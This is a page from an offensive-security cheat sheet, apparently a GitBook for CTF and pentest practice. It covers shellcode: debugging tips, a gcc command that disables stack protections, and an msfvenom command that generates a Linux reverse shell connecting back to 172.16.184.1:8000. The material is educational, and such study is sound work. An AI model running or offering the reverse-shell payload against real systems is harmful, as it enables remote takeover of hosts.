Leet Sheet
  • Leet Sheet
  • TODO
  • Reconnaissance
    • Automated Reconnaissance
    • Domains
    • Scour the Web
    • Metadata
  • Web App Hacking
    • Enumeration
      • Webserver Virtualhost Subdomains
      • Common Identifiers
      • Web Fuzzing
      • Directory Enumeration
        • Automated Directory Enumeration
        • Manual Directory Enumeration
      • Automated Web Technology Detection
    • User Attacks
      • CORS Misconfigurations
      • DNS Rebinding
      • Open Redirect
      • Clickjacking
      • Cross Site Request Forgery (CSRF)
      • Session Fixation
      • XSS/Cross Site Scripting
      • CSS Injection
      • HTML Injection
      • Phishing
    • Database Attacks
      • SQL Injection
      • Get a Shell From DB Connection
    • Server Attacks
      • Collisions
      • Server Side Request Forgery
        • Redis SSRF
      • Insecure Direct Object Reference
      • Timing-Based Side-Channel Attacks
      • Attacking Authentication Methods
        • JWT Attacks
        • Brute Forcing Web Forms
      • Loose Comparisons
      • Unrestricted File Upload
      • Insecure Deserialization
      • Command Injection
      • Path Traversal
      • File Inclusion
      • Server-Side Template Injection
      • XML External Entities Injection (XXE)
      • Server Misconfigurations
      • Parser Inconsistencies
      • Bypassing WAFs
    • DNS Attacks
    • Cloud Attacks
      • Amazon Web Services
    • Interesting Outdated Attacks
      • SQL Truncation
  • Network Hacking
    • General Enumeration
    • RPC
    • LDAP
    • SMB
    • SNMP
    • WMI
    • SSH
    • Kerberos
    • NTLM
    • Man-In-the-Middle (MITM)
    • WinRM
  • Post Exploitation
    • Windows
      • CLI Tips
      • Shells
      • Windows Script Host
      • Windows Privilege Escalation
        • Enumeration
        • JuicyPotato/RottenPotato
        • Kernel Exploits
        • Unquoted Service Paths
      • Active Directory
      • Dumping Passwords
      • NTLM Hash Theft
    • Linux
      • Port Forwarding
      • Shells
      • Linux Privilege Escalation
        • Enumeration
        • SUID Bit
        • Dot (.) In PATH
        • Escape From Restricted Shell
        • Symlink Trickery
        • Wildcard Injection
        • Docker group/LXD group
        • Password Reuse
      • Backdoors
    • Docker Container
    • General
  • Various
    • CVEs
    • SSH Agent Hijacking
    • Password Cracking
    • Cryptography
    • Non-Hacking
    • Malware
    • Forensics
      • Reading Keystrokes from USB PCAP Data
  • Binary Exploitation
    • Resources
    • Base Knowledge
    • Format String Exploits
    • Stack Smashing
    • Heap Exploits
    • Time-of-Check to Time-of-Use (TOCTOU)
    • Shellcode
    • Decompilation
    • Debugging
    • Exploit Mitigations and Protections
    • Exploit Protection Bypassing
    • Passing Input
    • Fuzzing
    • Automatic Exploitation
  • Physical Security
    • Mechanical Locks
    • Electronic Locks
    • Other Attacks
    • Destructive Entry
    • Elevator Attacks
  • Social Engineering
    • Phishing
Powered by GitBook
On this page
  • Common Problems
  • Don’t Send Data Too Fast
  • Stack Alignment
  • Testing out shellcode
  • Breakpoint trick
  • Shellcode repository
  • Generating Shellcode
  • Generating shellcode with msfvenom
  • Generating Assembly Using Pwntools

Was this helpful?

  1. Binary Exploitation

Shellcode

PreviousTime-of-Check to Time-of-Use (TOCTOU)NextDecompilation

Last updated 2 years ago

Was this helpful?

Common Problems

Don’t Send Data Too Fast

Take into account that sending data too fast might lead to unexpected results, especially in applications that were designed for slow humans.

For example, I couldn’t get a segfault to occur in . After I added 1 second sleeps between all the network traffic I sent, it started working 100% of the time.

Stack Alignment

You might be required to align the stack to 8 or 16 bytes when doing ROP chains. If your exploit is working locally but not remotely, then this is one possible cause.

Testing out shellcode

Breakpoint trick

If you’re not sure if your shellcode is being hit (for example in a regular execution environment without a debugger), then you can place a 0xCC instruction (INT3 breakpoint). When that breakpoint is hit, then you will get a message indicating that (Trace/breakpoint trap).

Though, it won't end up in dmesg. If you want it to end up in dmesg, then you can use something that causes a segfault, like pwn.asm(pwn.shellcraft.i386.crash()) from pwntools. You can also try pwn.asm(pwn.shellcraft.i386.infloop()) to create an infinite loop.

Shellcode repository

But really, using msfvenom to generate your own shellcode is better in pretty much every way.

Test files

There are usually test files along with shellcode. You might need to supply additional options for gcc, like making the stack executable, etc.

gcc test.c -o test -fno-stack-protector -z execstack -no-pie

Generating Shellcode

Generating shellcode with msfvenom

You can generate shellcode for a reverse shell using msfvenom.

This is an example of an x86 linux reverse shell, which will connect back to 172.16.184.1 on port 8000. It’s set to python format, so you can paste it into python.

msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.184.1 LPORT=8000 -a x86 --platform linux -f python

You can also assign bytes that the shellcode must not use (like NULL bytes or backslashes). This is useful if you have certain limitations.

Generating Assembly Using Pwntools

You can use pwntools to generate the machine code for whatever assembly you want to execute. For example, here is the syntax for doing relative jumps in pwntools on the command line:

pwn asm 'jmp $+0x20'

And this is how you can do it in Python code:

>>> import pwn
>>> pwn.asm('jmp $+0x20')
b'\xeb\x1e'

Fusion 2
https://githubmemory.com/repo/Gallopsled/pwntools/issues/1870githubmemory.com
Reference to the problem
shell-storm | Shellcodes Database
pwnlib.asm — Assembler functions — pwntools 4.8.0 documentation
Documentation
Logo